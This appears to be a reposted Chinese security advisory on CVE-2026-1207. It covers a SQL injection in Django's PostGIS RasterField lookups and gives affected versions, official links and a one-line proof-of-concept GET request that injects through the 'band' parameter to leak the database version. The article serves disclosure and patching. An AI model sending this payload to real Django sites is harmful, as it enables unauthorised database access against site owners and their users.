文章总结： Django框架的RasterField在PostGIS实现中存在SQL注入漏洞（CVE-2026-1207），攻击者可通过索引参数注入恶意SQL语句。影响版本包括6.0.2及以下、5.2.11及以下、4.2.28及以下。文档提供了POC示例（GET请求注入）并建议用户参考官方安全公告及时更新版本。 综合评分： 78 文章分类： 漏洞分析,WEB安全,渗透测试,安全工具,漏洞预警

CVE-2026-1207｜Django SQL注入漏洞（POC）

alicy alicy

信安百科

2026年4月7日 09:15 河北

0x00 前言

Django是一款由Python编写的开源Web应用框架，诞生于新闻网站的快速开发需求，遵循DRY（不重复造轮子）和“约定优于配置”原则，以MTV（模型-模板-视图）架构实现组件解耦。它提供全栈式开发工具，内置ORM让开发者用Python类操作数据库，无需编写SQL；自动生成的Admin后台可快速实现数据的增删改查；灵活的URL路由系统支持正则表达式匹配；模板引擎支持逻辑渲染与前后端分离；还集成了用户认证、表单验证、缓存机制等核心功能，同时内置SQL注入、XSS、CSRF等常见Web攻击防护。

凭借“开箱即用”的特性，Django能高效支撑内容管理系统、社交平台、电商网站、API后端等中大型项目，拥有活跃的社区生态和丰富的第三方扩展库，是Python Web开发领域的主流框架之一。

0x01 漏洞描述

在RasterField上执行的Raster lookups（仅在PostGIS上实现）允许远程攻击者通过带索引参数注入SQL。

0x02 CVE编号

CVE-2026-1207

0x03 影响版本

6.0之前的版本至6.0.2

5.2之前的版本至5.2.11

4.2之前的版本至4.2.28

0x04 漏洞详情

POC：

GET /?band=1)%20AND%201=CAST((SELECT%20version())%20AS%20INT)%20-- HTTP/1.1Host: {{target}}

0x05 参考链接

https://docs.djangoproject.com/en/dev/releases/security/

https://www.djangoproject.com/weblog/2026/feb/03/security-releases/

推荐阅读：

CVE-2025-64459｜Django SQL注入漏洞（POC）

CVE-2026-21509｜Microsoft Office安全功能绕过漏洞（POC）

CVE-2025-52691｜SmarterMail 未授权文件上传漏洞（POC）

Ps：国内外安全热点分享，欢迎大家分享、转载，请保证文章的完整性。文章中出现敏感信息和侵权内容，请联系作者删除信息。信息安全任重道远，感谢您的支持！！！

本公众号的文章及工具仅提供学习参考，由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害，均由使用者本人负责,本公众号及文章作者不为此承担任何责任。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：信安百科 alicy alicy《CVE-2026-1207｜Django SQL注入漏洞（POC）》